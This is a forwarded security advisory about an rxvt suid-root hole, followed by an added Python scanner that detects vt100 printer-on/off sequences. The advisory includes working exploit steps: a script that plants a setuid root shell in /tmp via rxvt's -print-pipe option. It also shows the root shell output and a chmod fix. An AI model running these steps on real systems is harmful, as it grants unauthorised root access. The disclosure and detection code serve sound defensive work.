
[Fwd: SECURITY: rxvt security hole]



Hi,

This one is a REAL alert, try it and you get root in 30 seconds...

Gilad.


David J Meltzer wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> [This was recently forwarded over the linux-alert mailing list.  I left
> the full text of the exploit in this post due to the fact that it is
> already quite well publicized.  I have not verified the exploit code
> myself.  --Jeff.]
> 
>    There is a major security hole in rxvt, a terminal emulator for X, when it
> is run on systems suid root, as is required on many configurations in order to
> write to the utmp file.  It is obvious from the code that this program was
> not written to be run suid root, it's a pity that sysadmins that install the
> compiled versions of this sort of code don't see the same warnings of 'run
> suid root at your own risk' that the people that put together a distribution
> with it that way see in the makefile.
>    The conditions that allow this particular hole to be exploited are rxvt
> compiled with the PRINT_PIPE option, and is running suid root.  The program
> sets the pipe to "lpr", without a pathname, but it's even easier than that
> to exploit because we can set the pipe to whatever we want with the -print-pipe
> option on the rxvt command line.  Although the program gives up its root
> privileges when forking to run a shell or other command, the original program
> continues running suid root the entire execution of the program.
>    Because the popen() call runs as root, whatever program that pipe opens
> will execute immediately as root.  In order to start the printer pipe, the
> vt100 printer-on command is ESC[5i.  The pipe can then be closed with the
> printer-off command, ESC[4i.  Exploiting this is extremely easy.
> 
>                    Program: rxvt
> Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
>                             rxvt suid root (and compiled with PRINT_PIPE)
>               Requirements: account on system, X server
>            Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
>        Security Compromise: root
>                     Author: Dave M. (davem@cmu.edu)
>                   Synopsis: rxvt fails to give up root privileges before
>                             opening a pipe to a program that can be specified
>                             by the user.
> 
> Exploit:
> 1.  Set DISPLAY environment variable if necessary so you can use x clients.
> 2.  In user shell:
>     $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
>     $ chmod +x /tmp/rxbug
>     $ rxvt -print-pipe /tmp/rxbug
> 3.  In rxvt xclient:
>     $ cat
>       ESC[5i
>       ESC[4i
>     (The client will close at this point with a broken pipe)
> 4.  $ /tmp/rxsh
>     # whoami
>     root
>     #
> 
> 
> ------------------------------------------------------------------------
> The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> have their implicit approval for security announcements, by prior
> arrangement.
> ------------------------------------------------------------------------
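As an added defender-side example (not part of the forwarded advisory), here is a scanner that flags the vt100 Media Copy sequences the advisory describes (CSI 5 i printer-on, CSI 4 i printer-off) in a terminal byte stream, so a session recording or pty log can be checked for attempts to drive a print pipe; the sample stream is constructed.

```python
"""Find vt100 Media Copy (printer on/off) control sequences in a byte stream.
Added detection example, not code from the advisory above.  The sample
stream at the bottom is constructed for illustration."""
from dataclasses import dataclass

ESC = 0x1B  # the ESC byte written as "ESC" in the advisory


@dataclass
class ControlSeq:
    offset: int   # byte offset of the ESC that starts the sequence
    params: str   # parameter and intermediate bytes, e.g. "5" or "?5"
    final: str    # final byte, e.g. "i"

    @property
    def is_media_copy(self) -> bool:
        # Final byte 'i' is Media Copy; param 5 starts the printer, 4 stops it.
        return self.final == "i"


def find_csi(stream: bytes) -> list:
    """Return every complete CSI sequence: ESC '[' params intermediates final.
    A truncated sequence at the end of the stream is ignored, not reported."""
    found, i, n = [], 0, len(stream)
    while i < n - 1:
        if stream[i] == ESC and stream[i + 1] == ord("["):
            j = i + 2
            while j < n and 0x30 <= stream[j] <= 0x3F:  # parameter bytes
                j += 1
            while j < n and 0x20 <= stream[j] <= 0x2F:  # intermediate bytes
                j += 1
            if j < n and 0x40 <= stream[j] <= 0x7E:     # final byte
                params = stream[i + 2:j].decode("ascii")
                found.append(ControlSeq(i, params, chr(stream[j])))
                i = j + 1
                continue
        i += 1
    return found


def media_copy_events(stream: bytes) -> list:
    """(offset, params) for printer-on/off sequences only."""
    return [(s.offset, s.params) for s in find_csi(stream) if s.is_media_copy]


# Constructed sample: a harmless clear-screen, then the two sequences from the advisory.
SAMPLE = b"hello\x1b[2Jworld\x1b[5isome text\x1b[4i\n"

if __name__ == "__main__":
    for off, params in media_copy_events(SAMPLE):
        print(f"media copy sequence CSI {params} i at byte {off}")
```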